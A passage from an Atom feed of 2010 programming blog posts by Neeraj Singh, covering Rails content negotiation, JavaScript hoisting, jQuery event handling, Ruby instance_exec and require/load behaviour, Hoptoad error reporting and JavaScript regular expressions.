Mime::ALL      return order.first    elsif order.include?(priority)      return priority    end  end  order.include?(Mime::ALL) ? formats.first : nilend</code></pre><p>What it's saying is that if Mime::ALL is sent then pick the first one declaredin the respond_to block. So be careful with order in which formats are declaredinside the respond_to block.</p><p>The order in which formats are declared can be real issue. Checkout case (Linkis not available) where the author ran into issue because of the order in whichformats are declared.</p><p>So far so good. However what if there is no respond<em>to block. If I don't haverespond_to block and if I have _index.html.erb</em>, <em>index.js.erb</em> and<em>index.xml.builder</em> files in my view directory then which one will be picked up.In this case Rails will go over all the registered formats in the order in whichthey are declared and will try to find a match . So in this case it matters inwhat order Mime types are registered. Here is the code that registers Mimetypes.</p><pre><code class="language-ruby">Mime::Type.register &quot;text/html&quot;, :html, %w( application/xhtml+xml ), %w( xhtml )Mime::Type.register &quot;text/plain&quot;, :text, [], %w(txt)Mime::Type.register &quot;text/javascript&quot;, :js, %w( application/javascript application/x-javascript )Mime::Type.register &quot;text/css&quot;, :cssMime::Type.register &quot;text/calendar&quot;, :icsMime::Type.register &quot;text/csv&quot;, :csvMime::Type.register &quot;application/xml&quot;, :xml, %w( text/xml application/x-xml )Mime::Type.register &quot;application/rss+xml&quot;, :rssMime::Type.register &quot;application/atom+xml&quot;, :atomMime::Type.register &quot;application/x-yaml&quot;, :yaml, %w( text/yaml )Mime::Type.register &quot;multipart/form-data&quot;, :multipart_formMime::Type.register &quot;application/x-www-form-urlencoded&quot;, :url_encoded_form# http://www.ietf.org/rfc/rfc4627.txt# http://www.json.org/JSONRequest.htmlMime::Type.register &quot;application/json&quot;, :json, %w( text/x-json application/jsonrequest )# Create Mime::ALL but do not add it to the SET.Mime::ALL = Mime::Type.new(&quot;*/*&quot;, :all, [])</code></pre><p>As you can see <em>text/html</em> is first in the list, <em>text/javascript</em> next and then<em>application/xml</em>. So Rails will look for view file in the following order:<em>index.html.erb</em> , <em>index.js.erb</em> and <em>index.xml.builder</em> .</p><h2>Case 2: HTTP_ACCEPT with no */*</h2><p>I am going to assume that in this case HTTP_ACCEPT sent by browser looks reallysimple like this</p><pre><code class="language-plaintext">text/javascript, text/html, text/plain</code></pre><p>I am also assuming that my respond_to block looks like this</p><pre><code class="language-ruby">respond_to do |format|  format.html { render :text =&gt; 'this is html' }  format.js  { render :text =&gt; 'this is js' }end</code></pre><p>So browser is saying that I prefer documents in following order</p><pre><code class="language-plaintext"> js html plain</code></pre><p>The order in which formats are declared is</p><pre><code class="language-plaintext">html (format.html)js (format.js)</code></pre><p>In this case rails will go through each Mime type that browser supports from topto bottom one by one. If a match is found then response is sent otherwise railstries find match for next Mime type. First in the list of Mime types supportedby browser is js and Rails does find that my respond<em>to block supports <em>.js</em> .Rails executes _format.js</em> block and response is sent to browser.</p><h2>Case 3: Ajax requests</h2><p>When an AJAX request is made the Safari, Firefox and Chrome send only one itemin HTTP_ACCEPT and that is */*. So if you are making an AJAX request thenHTTP_ACCEPT for these three browsers will look like</p><pre><code class="language-plaintext">Chrome: */*Firefox: */*Safari: */*</code></pre><p>and if your respond_to block looks like this</p><pre><code class="language-ruby">respond_to do |format|  format.html { render :text =&gt; 'this is html' }  format.js  { render :text =&gt; 'this is js' }end</code></pre><p>then the first one will be served based on the formats order. And in this casehtml response would be sent for an AJAX request. This is not what you want.</p><p>This is the reason why if you are using jQuery and if you are sending AJAXrequest then you should add something like this in your <em>application.js</em> file</p><pre><code class="language-javascript">$(function () {  $.ajaxSetup({    beforeSend: function (xhr) {      xhr.setRequestHeader(&quot;Accept&quot;, &quot;text/javascript&quot;);    },  });});</code></pre><p>If you are using a newer version of rails.js then you don't need to add abovecode since it is already take care of for you through<a href="https://github.com/rails/jquery-ujs/commit/b6a3500bfb4b845d2c5e2f81b3c57a62fffd0845">this commit</a>.</p><h2>Trying it out</h2><p>If you want to play with HTTP_ACCEPT header then put the following line in yourcontroller to inspect the HTTP_ACCEPT attribute.</p><pre><code class="language-ruby">puts request.headers['HTTP_ACCEPT']</code></pre><p>I used following rake task to set custom HTTP_ACCEPT attribute.</p><pre><code class="language-ruby">require &quot;net/http&quot;require &quot;uri&quot;task :custom_accept do  uri = URI.parse(&quot;http://localhost:3000/users&quot;)  http = Net::HTTP.new(uri.host, uri.port)  request = Net::HTTP::Get.new(uri.request_uri)  request[&quot;Accept&quot;] = &quot;text/html, application/xml, */*&quot;  response = http.request(request)  puts response.bodyend</code></pre><h2>Thanks</h2><p>I got familiar with intricacies of mime parsing while working on<a href="https://rails.lighthouseapp.com/projects/8994-ruby-on-rails/tickets/6022-content-negotiation-fails-for-some-headers-regression#ticket-6022-10">ticket #6022</a>. A big thanks to <a href="http://twitter.com/#!/josevalim">Jos Valim</a> for patientlydealing with me while working on this ticket.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Variable declaration at the top is not just pretty thing]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/variable-hoisting-is-not-just-pretty-thing"/>
      <updated>2010-11-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/variable-hoisting-is-not-just-pretty-thing</id>
      <content type="html"><![CDATA[<p>I was discussing JavaScript code with a friend and he noticed that I haddeclared all the variables at the top.</p><p>He likes to declare the variable where they are used to be sure that thevariable being used is declared with var otherwise that variable will becomeglobal variable. This fear of accidentally creating a global variables wants himto see variable declaration next to where it is being used.</p><h2>Use the right tool</h2><pre><code class="language-javascript">var payment;payment = soldPrice + shippingCost;</code></pre><p>In the above case user has declared payment variable in the middle so that he issure that payment is declared. However if there is a typo as given below then hehas accidentally created a global variable &quot;payment&quot;.</p><pre><code class="language-javascript">var payment; //there is a typopayment = soldPrice + shippingCost;</code></pre><p>Having variable declaration next to where variable is being used is not a safeway of guaranteeing that variable is declared. Use the right tool and that wouldbe <a href="http://www.jslint.com/">jslint</a> validation. I use MacVim and I use<a href="http://www.javascriptlint.com/">Javascript Lint</a>. So every time I save aJavaScript file validation is done and I get warning if I am accidentallycreating a global variable.</p><p>You can configure such that JSLint validation runs when you check your code intogit or when you push to github. Or you can have a custom rake task. Manysolutions are available choose the one that fits you. But do not rely on manualinspection.</p><h2>Variable declaration are being moved to the top by the browser</h2><p>Take a look at following code. One might expect that console.log will print&quot;Neeraj&quot; but the output will be &quot;undefined&quot; . That is because even though youhave declaration variables next to where they are being used, browsers liftthose declarations to the very top.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;function lab() {  console.log(name);  var name = &quot;John&quot;;  console.log(name);}lab();</code></pre><p>Browser converts above code into one shown below.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;function lab() {  var name = undefined;  console.log(name);  name = &quot;John&quot;;  console.log(name);}lab();</code></pre><p>In order to avoid this kind of mistakes it is preferred to declared variables atthe top like this.</p><pre><code class="language-javascript">name = &quot;Neeraj&quot;;function lab() {  var name = &quot;John&quot;;  console.log(name);  console.log(name);}lab();</code></pre><p>Looking at the first set of code a person might think that</p><p>Also remember that scope of variable in JavaScript at the function level.</p><h2>Implications on how functions are declared</h2><p>There are two ways of declaring a function.</p><pre><code class="language-javascript">var myfunc = function () {};function myfunc2() {}</code></pre><p>In the first case only the variable declaration <code>myfunc</code> is getting hoisted up.The definition of myfunc is <em>NOT</em> getting hoisted. In the second case bothvariable declaration and function definition is getting hoisted up. For moreinformation on this refer to my<a href="two-ways-of-declaring-functions">previous blog on the same topic</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[An inline confirmation utility powered by jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/iconfirm-an-inline-confirmation-jquery-plugin"/>
      <updated>2010-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/iconfirm-an-inline-confirmation-jquery-plugin</id>
      <content type="html"><![CDATA[<p>I needed inline confirmation utility.</p><p>With jQuery it was easy.</p><p>After a few hours I had <code>iconfirm</code>.</p><p>This project is deprecated now.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Return false has changed in jquery 1.4.3]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/return-false-in-jquery-1.4.3"/>
      <updated>2010-10-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/return-false-in-jquery-1.4.3</id>
      <content type="html"><![CDATA[<p>jQuery 1.4.3 was recently<a href="http://blog.jquery.com/2010/10/16/jquery-143-released/">released</a>. If youupgrade to jQuery 1.4.3 you will notice that the behavior of <code>return false</code> haschanged in this version. First let's see what <code>return false</code> does.</p><h2>return false</h2><pre><code class="language-javascript">$(&quot;a&quot;).click(function () {  console.log(&quot;clicked&quot;);  return false;});</code></pre><p>First ensure that above code is executed on domready. Now if I click on any linkthen two things will happen.</p><pre><code class="language-plaintext">e.preventDefault() will be called .e.stopPropagation() will be called .</code></pre><h2>e.preventDefault()</h2><p>As the name suggests, calling <code>e.preventDefault()</code> will make sure that thedefault behavior is not executed.</p><pre><code class="language-plaintext">&lt;a href='www.google.com'&gt;click me&lt;/a&gt;</code></pre><p>If above link is clicked then the default behavior of the browser is to take youto <code>www.google.com</code>. However by invoking <code>e.preventDefault()</code> browser will notgo ahead with default behavior and I will &lt;strong&gt;not&lt;/strong&gt; be taken to<code>www.google.com</code>.</p><h2>e.stopPropagation</h2><p>When a link is clicked then an event &quot;click event&quot; is created. And this eventbubbles all the way up to the top. By invoking <code>e.stopPropagation</code> I am askingbrowser to not to propagate the event. In other words the event will stopbubbling.</p><pre><code class="language-html">&lt;div class=&quot;first&quot;&gt;  &lt;div class=&quot;two&quot;&gt;    &lt;a href=&quot;www.google.com&quot;&gt;click me&lt;/a&gt;  &lt;/div&gt;&lt;/div&gt;</code></pre><p>If I click on &quot;click me&quot; then &quot;click event&quot; will start bubbling. Now let's saythat I catch this event at <code>.two</code> and if I call <code>e.stopPropagation()</code> then thisevent will never reach to <code>.first</code> .</p><h2>e.stopImmediatePropagation</h2><p>First note that you can bind more than one event to an element. Take a look atfollowing case.</p><pre><code class="language-html">&lt;a class=&quot;one&quot;&gt;one&lt;/a&gt;</code></pre><p>I am going to bind three events to the above element.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  console.log(&quot;first&quot;);});$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  console.log(&quot;second&quot;);  e.stopImmediatePropagation();});$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {  console.log(&quot;third&quot;);});</code></pre><p>In this case there are three events bound to the same element. Notice thatsecond event binding invokes <code>e.stopImmediatePropagation()</code> . Calling<code>e.stopImmediatePropagation</code> does two things.</p><p>Just like <code>stopPropagation</code> it will stop the bubbling of the event. So anyparent of this element will not get this event.</p><p>However <code>stopImmdiatePropagation</code> stops the event bubbling even to the siblings.It kills the event right then and there. That's it. End of the event.</p><p>Once again calling <code>stopPropagation</code> means stop this event going to parent. Andcalling <code>stopImmediatePropagation</code> means stop passing this event to other eventhandlers bound to itself.</p><p>If you are interested<a href="http://www.w3.org/TR/2006/WD-DOM-Level-3-Events-20060413/events.html#Events-Event-stopImmediatePropagation">here is link to </a>DOM Level 3 Events spec.</p><h2>Back to original problem</h2><p>Now that I have described what <code>preventDefault</code>, <code>stopPropagation</code> and<code>stopImmediatePropagation</code> does lets see what changed in jQuery 1.4.3.</p><p>In jQuery 1.4.2 when I execute &quot;return false&quot; then that action was same asexecuting:</p><pre><code class="language-javascript">e.preventDefault();e.stopPropagation();e.stopImmediatePropagation();</code></pre><p>Now <code>e.stopImmediatePropagation</code> internally calls <code>e.stopPragation</code> but I haveadded here for visual clarity.</p><p>Fact that <code>return false</code> was calling <code>e.stopImmeidatePropagation</code> was a bug. Getthat. It was a bug which got fixed in jquery 1.4.3.</p><p>So in jquery 1.4.3 <code>e.stopImmediatePropagation</code> is not called. Checkout thispiece of code from <code>events.js</code> of jquery code base.</p><pre><code class="language-javascript">if (ret !== undefined) {  event.result = ret;  if (ret === false) {    event.preventDefault();    event.stopPropagation();  }}</code></pre><p>As you can see when <code>return false</code> is invoked then <code>e.stopImmediatePropagation</code>is &lt;strong&gt;not&lt;/strong&gt; called.</p><h2>It gets complicated with live and a bug in jQuery 1.4.3</h2><p>To make the case complicated, jQuery 1.4.3 has a bug in which<code>e.preventStopImmediatePropagation</code> doest not work. Here is<a href="http://forum.jquery.com/topic/e-stopimmedidatepropagation-does-not-work-with-live-or-with-delegate">a link to this bug</a>I reported.</p><p>To understand the bug take a look at following code:</p><pre><code class="language-plaintext">&lt;a href='' class='first'&gt;click me&lt;/a&gt;$('a.first').live('click', function(e){    alert('hello');    e.preventDefault();    e.stopImmediatePropagation();});$('a.first').live('click', function(){    alert('world');});</code></pre><p>Since I am invoking <code>e.stopImmediatePropagation</code> I should never see<code>alert world</code>. However you will see that alert if you are using jQuery 1.4.3.You can play with it <a href="http://jsbin.com/ujipi4/3#html">here</a> .</p><p>This bug has been fixed as per<a href="http://github.com/jquery/jquery/commit/974b5aeab7a3788ff5fb9db87b9567784e0249fc">this commit</a>. Note that the commit mentioned was done after the release of jQuery 1.4.3. Toget the fix you will have to wait for jQuery 1.4.4 release or use jQuery edge.</p><h2>I am using rails.js (jquery-ujs). What do I do?</h2><p>As I have shown &quot;return false&quot; does not work in jQuery 1.4.3 . However I wouldhave to like to have as much backward compatibility in <code>jquery-ujs</code> as muchpossible so that the same code base works with jQuery 1.4 through 1.4.3 sincenot every one upgrades immediately.</p><p><a href="http://github.com/rails/jquery-ujs/commit/f991faf0074487b43a061168cdbfd102ee0c182c">This commit</a>should make <code>jquery-ujs</code> jquery 1.4.3 compatible.<a href="http://github.com/rails/jquery-ujs/issues">Many issues</a> have been logged atjquery-ujs and I will take a look at all of them one by one. Please do provideyour feedback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[instance_exec , changing self and params]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/instance-exec-changing-self-and-parameters-to-proc"/>
      <updated>2010-05-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/instance-exec-changing-self-and-parameters-to-proc</id>
      <content type="html"><![CDATA[<p><em>Here is<a href="understanding-instance-exec-in-ruby">updated article on the same topic</a> .</em></p><p>Following code will print <code>99</code> as the output.</p><pre><code class="language-ruby">class Klass  def initialize    @secret = 99  endendputs Klass.new.instance_eval { @secret }</code></pre><p>Nothing great there. However try passing a parameter to <code>instance_eval</code> .</p><pre><code class="language-ruby">puts Klass.new.instance_eval(self) { @secret }</code></pre><p>You will get following error.</p><pre><code class="language-ruby">wrong number of arguments (1 for 0)</code></pre><p>So <code>instance_eval</code> does not allow you to pass parameters to a block.</p><h2>How to get around to the restriction that instance_eval does not accept parameters</h2><p><code>instance_exec</code> was added to ruby 1.9 and it allows you to pass parameters to aproc. This feature has been backported to ruby 1.8.7 so we don't really needruby 1.9 to test this feature. Try this.</p><pre><code class="language-ruby">class Klass  def initialize    @secret = 99  endendputs Klass.new.instance_exec('secret') { |t| eval&quot;@#{t}&quot; }</code></pre><p>Above code works. So now we can pass parameters to block. Good.</p><h2>Changing value of self</h2><p>Another feature of <code>instance_exec</code> is that it changes the value of <code>self</code>. Toillustrate that I need to give a longer example.</p><pre><code class="language-ruby">module Kernel  def singleton_class    class &lt;&lt; self      self    end  endendclass Human  proc = lambda { puts 'proc says my class is ' + self.name.to_s }  singleton_class.instance_eval do    define_method(:lab)  do      proc.call    end  endendclass Developer &lt; HumanendHuman.lab # class is HumanDeveloper.lab # class is Human ; oops</code></pre><p>Notice that in that above case <code>Developer.lab</code> says &quot;Human&quot;. And that is theright answer from ruby perspective. However that is not what I intended. rubystores the binding of the proc in the context it was created and hence itrightly reports that self is &quot;Human&quot; even though it is being called by<code>Developer</code>.</p><p>Go to<a href="http://facets.rubyforge.org/apidoc/api/core/index.html">http://facets.rubyforge.org/apidoc/api/core/index.html</a>and look for <code>instance_exec</code> method. The doc says</p><p>&lt;blockquote&gt;Evaluate the block with the given arguments within the context of this object,so self is set to the method receiver.&lt;/blockquote&gt;</p><p>It means that <code>instance_exec</code> evaluates self in a new context. Now try the samecode with <code>instance_exec</code> .</p><pre><code class="language-ruby">module Kernel  def singleton_class    class &lt;&lt; self      self    end  endendclass Human  proc = lambda { puts 'proc says my class is ' + self.name.to_s }  singleton_class.instance_eval do    define_method(:lab)  do      self.instance_exec &amp;proc    end  endendclass Developer &lt; HumanendHuman.lab # class is HumanDeveloper.lab # class is Developer</code></pre><p>In this case <code>Developer.lab</code> says <code>Developer</code> and not <code>Human</code>.</p><p>You can also checkout this page (Link is not available) which has much moredetailed explanation of <code>instance_exec</code> and also emphasizes that <code>instance_exec</code>does pass a new value of <code>self</code> .</p><p><code>instance_exec</code> is so useful that <code>ActiveSupport</code> needs it. And since ruby 1.8.6does not have it <code>ActiveSupport</code> has code to support it.</p><p>I came across <code>instance_exec</code> issue while resolving<a href="https://rails.lighthouseapp.com/projects/8994/tickets/4507">#4507 rails ticket</a>. The final solution did not need <code>instance_exec</code> but I learned a bit about it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[$LOADED_FEATURES and require, load, require_dependency]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/require-load-loaded_features"/>
      <updated>2010-05-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/require-load-loaded_features</id>
      <content type="html"><![CDATA[<p>Rails developers know that in development mode classes are loaded on demand. Inproduction mode all the classes are loaded as part of bootstrapping the system.Also in development mode classes are reloaded every single time page isrefreshed.</p><p>In order to reload the class, Rails first has to <code>unload</code> . That unloading isdone something like this.</p><pre><code class="language-ruby"># unload User classObjet.send(:remove_const, :User)</code></pre><p>However a class might have other constants and they need to be unloaded too.Before you unload those constants you need to know all the constants that aredefined in the class that is being loaded. Long story short rails keep track ofevery single constant that is loaded when it loads <code>User</code> or <code>UserController</code>.</p><h2>Dependency mechanism is not perfect</h2><p>Sometimes dependency mechanism by rails lets a few things fall through thecrack. Try following case.</p><pre><code class="language-ruby">require 'open-uri'class UsersController &lt; ApplicationController  def index    open(&quot;http://www.ruby-lang.org/&quot;) {|f| }    render :text =&gt; 'hello'  endend</code></pre><p>Start the server in development mode and visit <code>http://localhost:3000/users</code> .First time every thing will come up fine. Now refresh the page. This time youshould get an exception <code>uninitialized constant OpenURI</code> .</p><p>So what's going on.</p><p>After the page is served the very first time then at the end of response railswill unload all the constants that were autoloaded including <code>UsersController</code>.However while unloading <code>UsersContorller</code> rails will also unload <code>OpenURI</code>.</p><p>When the page is refreshed then <code>UsersController</code> will be loaded and<code>require 'open-uri'</code> will be called. However that require will return <code>false</code>.</p><h2>Why require returns false</h2><p>Try the following test case in irb.</p><p>step 1</p><pre><code class="language-ruby">irb(main):002:0&gt; require 'ostruct'=&gt; true</code></pre><p>step 2</p><pre><code class="language-ruby">irb(main):005:0* Object.send(:remove_const, :OpenStruct)=&gt; OpenStruct</code></pre><p>step 3 : ensure that OpenStruct is truly removed</p><pre><code class="language-ruby">irb(main):006:0&gt; Object.send(:remove_const, :OpenStruct)NameError: constant Object::OpenStruct not defined        from (irb):6:in `remove_const'        from (irb):6:in `send'        from (irb):6</code></pre><p>step 4</p><pre><code class="language-ruby">irb(main):007:0&gt; require 'ostruct'=&gt; false</code></pre><p>step 5</p><pre><code class="language-ruby">irb(main):009:0&gt; OpenStruct.newNameError: uninitialized constant OpenStruct        from (irb):9</code></pre><p>Notice that in the above case in step 4 require returns <code>false</code>. 'require'checks against <code>$LOADED_FEATURES</code>. When <code>OpenStruct</code> was removed then it was notremoved from <code>$LOADED_FEATURES</code> and hence ruby thought <code>ostruct</code> is alreadyloaded.</p><p>How to get around to this issue.</p><p><code>require</code> loads only once. However <code>load</code> loads every single time. In stead of'require', 'load' could be used in this case.</p><pre><code class="language-ruby">irb(main):001:0&gt; load 'ostruct.rb'=&gt; trueirb(main):002:0&gt; OpenStruct.new=&gt; #&lt;OpenStruct&gt;</code></pre><h2>Back to the original problem</h2><p>In our rails application refresh of the page is failing. To get around to thatissue use <code>require_dependency</code> instead of <code>require</code>. <code>require_dependency</code> is arails thing. Under the hood rails does the same trick we did in the previousstep. Rails calls <code>kernel.load</code> to load the constants that would fail if requirewere used.</p>]]></content>
    </entry><entry>
       <title><![CDATA[I am not seeing hoptoad messages. Now I know why.]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/I-am-not-seeing-hoptoad-messages"/>
      <updated>2010-04-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/I-am-not-seeing-hoptoad-messages</id>
      <content type="html"><![CDATA[<p><em>Following code has been tested with Rails 2.3.5 .</em></p><p>Every one knows for sure that hoptoad notifier sends exception messages toserver in <em>production</em> environment. Between 'development' and 'production' therecould be a number of environments. Some of these would have settings closer to'development' environment and some would have setting closely matching thesettings of 'production' environment.</p><p>When you have many environments and when an exception occurs, one is not reallysure if that message is getting logged at hoptoad or not. Here is a run down ofwhich messages will get logged and why.</p><h3>It alls starts with rails</h3><p>When an exception occurs while rendering a page then <code>action_controller</code> catchesthe exception. Following logic is evaluated to decide if user should see anerror page with full stack trace or 'we are sorry something went wrong' message.</p><pre><code class="language-ruby">if consider_all_requests_local || local_request?  rescue_action_locally(exception)else  rescue_action_in_public(exception)end</code></pre><p>Let's look at first part <code>consider_all_requests_local</code> . Open<code>~/config/environments/development.rb</code> and <code>~/config/environments/production.rb</code>.</p><pre><code class="language-ruby"># ~/config/environments/development.rbconfig.action_controller.consider_all_requests_local = true# ~/config/environments/production.rbconfig.action_controller.consider_all_requests_local = false</code></pre><p>As you can see in development mode all requests are local. Be careful with whatyou put in your intermediary environments.</p><p>If you want to override that value then you can do like this.</p><pre><code class="language-ruby">#~/app/controllers/application_controller.rbActionController::Base.consider_all_requests_local = true</code></pre><p>The second part of the equation was <code>local_request?</code> .</p><p>Rails has following code for that method.</p><pre><code class="language-ruby">LOCALHOST = '127.0.0.1'.freezedef local_request?  request.remote_addr == LOCALHOST &amp;&amp; request.remote_ip == LOCALHOSTend</code></pre><p>As you can see all requests coming from <code>127.0.0.1</code> are considered local even ifRAILS_ENV is 'production'. For testing purpose you can override this value likethis.</p><pre><code class="language-ruby">#~/app/controllers/application_controller.rbdef local_request? falseend</code></pre><h2>Hoptoad has access to exception now what</h2><p>If <code>consider_all_request_local</code> is false and if request is not local thenhoptoad will get access to exception thanks to <code>alias_method_chain</code>.</p><pre><code class="language-ruby">def self.included(base)  base.send(:alias_method, :rescue_action_in_public_without_hoptoad, :rescue_action_in_public)  base.send(:alias_method, :rescue_action_in_public, :rescue_action_in_public_with_hoptoad)end</code></pre><p>In <code>rescue_action_in_public_with_hoptoad</code> there is a call to <code>notify_or_ignore</code>like this.</p><pre><code class="language-ruby">unless hoptoad_ignore_user_agent?  HoptoadNotifier.notify_or_ignore(exception, hoptoad_request_data)end</code></pre><p>For majority of us there is no special handling for a particular <code>user_agent</code> .</p><pre><code class="language-ruby">def notify_or_ignore(exception, opts = {})  notice = build_notice_for(exception, opts)  send_notice(notice) unless notice.ignore?end</code></pre><p>Hoptoad defines following methods as ignorable by default and you won't getnotifications for following types of exceptions.</p><pre><code class="language-ruby">IGNORE_DEFAULT = ['ActiveRecord::RecordNotFound',                   'ActionController::RoutingError',                   'ActionController::InvalidAuthenticityToken',                   'CGI::Session::CookieStore::TamperedWithCookie',                   'ActionController::UnknownAction']</code></pre><p>Next hop is method <code>send_notice</code> .</p><pre><code class="language-ruby">def send_notice(notice)  if configuration.public?    sender.send_to_hoptoad(notice.to_xml)  endend</code></pre><p><code>configuration.public?</code> is defined like this.</p><pre><code class="language-ruby">@development_environments = %w(development test cucumber)def public?  !development_environments.include?(environment_name)end</code></pre><p>As you can see if the <code>Rails.env</code> is <code>development</code> or <code>test</code> or <code>cucumber</code> theexception will not be reported to hoptoad server.</p>]]></content>
    </entry><entry>
       <title><![CDATA[List of only the elements that contains]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/list-of-only-the-elements"/>
      <updated>2010-04-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/list-of-only-the-elements</id>
      <content type="html"><![CDATA[<p>I was toying with<a href="http://kilianvalkhof.com/2010/javascript/how-to-build-a-fast-simple-list-filter-with-jquery">simple list filter plugin</a>and ended up with this markup.</p><pre><code class="language-html">&lt;div id=&quot;lab&quot;&gt;  &lt;ul id=&quot;list&quot;&gt;    &lt;li&gt;&lt;a href=&quot;&quot;&gt;USA&lt;/a&gt;&lt;/li&gt;  &lt;ul&gt;  &lt;p&gt;    &lt;a href=''&gt;USA&lt;/a&gt;  &lt;/p&gt;&lt;/div&gt;</code></pre><p>I want to get all links that contains the word <code>USA</code>. Simple enough. jQuerysupports <code>contains</code> selector.</p><pre><code class="language-javascript">$(&quot;:contains('USA')&quot;);</code></pre><p>Above query results in following items.</p><pre><code class="language-ruby">[html, body#body, div#lab, ul#list, li, a, ul, p, a]</code></pre><p>That is because <a href="http://api.jquery.com/contains-selector">contains</a> looks forgiven string under all the descendants.</p><h2>has method to rescue</h2><p>jQuery <a href="http://api.jquery.com/has">has</a> method which returns the list ofelements which have a descendant which has the given string.</p><pre><code class="language-javascript">b = $(&quot;*&quot;).has(&quot;:contains('USA')&quot;);</code></pre><p>Above query results in following items.</p><pre><code class="language-ruby">[html, body#body, div#lab, ul#list, li, ul, p]</code></pre><h2>Final result</h2><pre><code class="language-javascript">a = $(&quot;:contains('USA')&quot;);b = $(&quot;*&quot;).has(&quot;:contains('USA')&quot;);c = a.not(b);console.log(c);</code></pre><p>Above query results in following items.</p><pre><code class="language-ruby"> [a, a]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Singleton function in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/singleton-function-in-javascript"/>
      <updated>2010-04-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/singleton-function-in-javascript</id>
      <content type="html"><![CDATA[<p>Recently I was discussed with a friend how to create a singleton function inJavaScript. I am putting the same information here in case it might help someoneunderstand JavaScript better.</p><h2>Creating an Object</h2><p>Simplest solution is creating an instance of the object.</p><pre><code class="language-javascript">var Logger = function (path) {  this.path = path;};l1 = new Logger(&quot;/home&quot;);console.log(l1);l2 = new Logger(&quot;/dev&quot;);console.log(l2);console.log(l1 === l2);</code></pre><p>Above solution works. However <code>l2</code> is a new instance of <code>Logger</code> .</p><h2>Singleton solution using a global variable</h2><pre><code class="language-javascript">window.global_logger = null;var Logger = function (path) {  if (global_logger) {    console.log(&quot;global logger already present&quot;);  } else {    this.path = path;    window.global_logger = this;  }  return window.global_logger;};l1 = new Logger(&quot;/home&quot;);console.log(l1);l2 = new Logger(&quot;/dev&quot;);console.log(l2);console.log(l1 === l2);</code></pre><p>Above solution works. However this solution relies on creating a globalvariable. To the extent possible it is best to avoid polluting global namespace.</p><h2>Single solution without polluting global namespace</h2><pre><code class="language-javascript">var Logger = (function () {  var _instance;  return function (path) {    if (_instance) {      console.log(&quot;an instance is already present&quot;);    } else {      this.path = path;      _instance = this;    }    return _instance;  };})(); //note that it is self invoking functionvar l1 = new Logger(&quot;/root&quot;);console.log(l1);var l2 = new Logger(&quot;/dev&quot;);console.log(l2);console.log(l1 === l2);</code></pre><p>This solution does not pollute global namespace.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Regular expression in JavaScript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/regular-expressions-in-JavaScript"/>
      <updated>2010-03-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/regular-expressions-in-JavaScript</id>
      <content type="html"><![CDATA[<p>Regular expressions is a powerful tool in any language. Here I am discussing howto use regular expression in JavaScript.</p><h2>Defining regular expressions</h2><p>In JavaScript regular expression can be defined two ways.</p><pre><code class="language-javascript">var regex = /hello/gi; // i is for ignore case. g is for global.var regex = new RegExp(&quot;hello&quot;, &quot;ig&quot;);</code></pre><p>If I am defining regular expression using<a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp#Properties_2">RegExp</a>then I need to add escape character in certain cases.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;var regex = new RegExp(&quot;hello_\\w*&quot;, &quot;ig&quot;); //notice the extra backslash before \w</code></pre><p>When I am defining regular expression using RegExp then <code>\w</code> needs to be escapedotherwise it would be taken literally.</p><h2>test method</h2><p><a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp/test">test method</a>is to check if a match is found or not. This method returns true or false.</p><pre><code class="language-javascript">var regex = /hello/gi;var text = &quot;hello_you&quot;;var bool = regex.test(text);</code></pre><h2>exec method</h2><p><a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/RegExp/exec">exec method</a>finds if a match is found or not. It returns an array if a match is found.Otherwise it returns null.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;var text = &quot;hello_you&quot;;var matches = regex.exec(text);console.log(matches); //=&gt; hello_you</code></pre><h2>match method</h2><p><a href="https://developer.mozilla.org/en/Core_JavaScript_1.5_Reference/Global_Objects/String/match">match method</a>acts exactly like exec method if no <code>g</code> parameter is passed. When global flag isturned on the match returns an Array containing all the matches.</p><p>Note that in <code>exec</code> the syntax was <code>regex.exec(text)</code> while in <code>match</code> methodthe syntax is <code>text.match(regex)</code> .</p><pre><code class="language-javascript">var regex = /hello_\w*/i;var text = &quot;hello_you and hello_me&quot;;var matches = text.match(regex);console.log(matches); //=&gt; ['hello_you']</code></pre><p>Now with global flag turned on.</p><pre><code class="language-javascript">var regex = /hello_\w*/gi;var text = &quot;hello_you and hello_me&quot;;var matches = text.match(regex);console.log(matches); //=&gt; 